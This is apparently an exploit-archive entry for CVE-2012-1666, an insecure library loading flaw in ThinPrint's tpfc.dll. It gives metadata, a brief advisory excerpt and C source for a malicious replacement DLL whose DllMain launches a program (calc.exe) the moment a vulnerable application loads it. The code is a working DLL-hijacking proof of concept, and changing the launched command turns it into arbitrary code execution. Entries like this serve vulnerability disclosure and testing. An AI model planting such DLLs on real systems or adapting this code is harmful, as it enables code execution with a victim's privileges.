ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution

Author: Moshe Zioni
type: local
platform: windows
port: 
date_added: 2012-09-04 
date_updated: 2015-08-16 
verified: 1 
codes: CVE-2012-1666;OSVDB-85477 
tags: 
aliases:  
screenshot_url:  
application_url: 

// source: https://www.securityfocus.com/bid/55421/info

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.

Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.

#include <windows.h>

	int hijack_poc ()
	{
	  WinExec ( "calc.exe" , SW_NORMAL );
	  return 0 ;
	}

	BOOL WINAPI DllMain
		 (	HINSTANCE hinstDLL ,
			DWORD dwReason ,
			LPVOID lpvReserved )
	{
	  hijack_poc () ;
	  return 0 ;
	}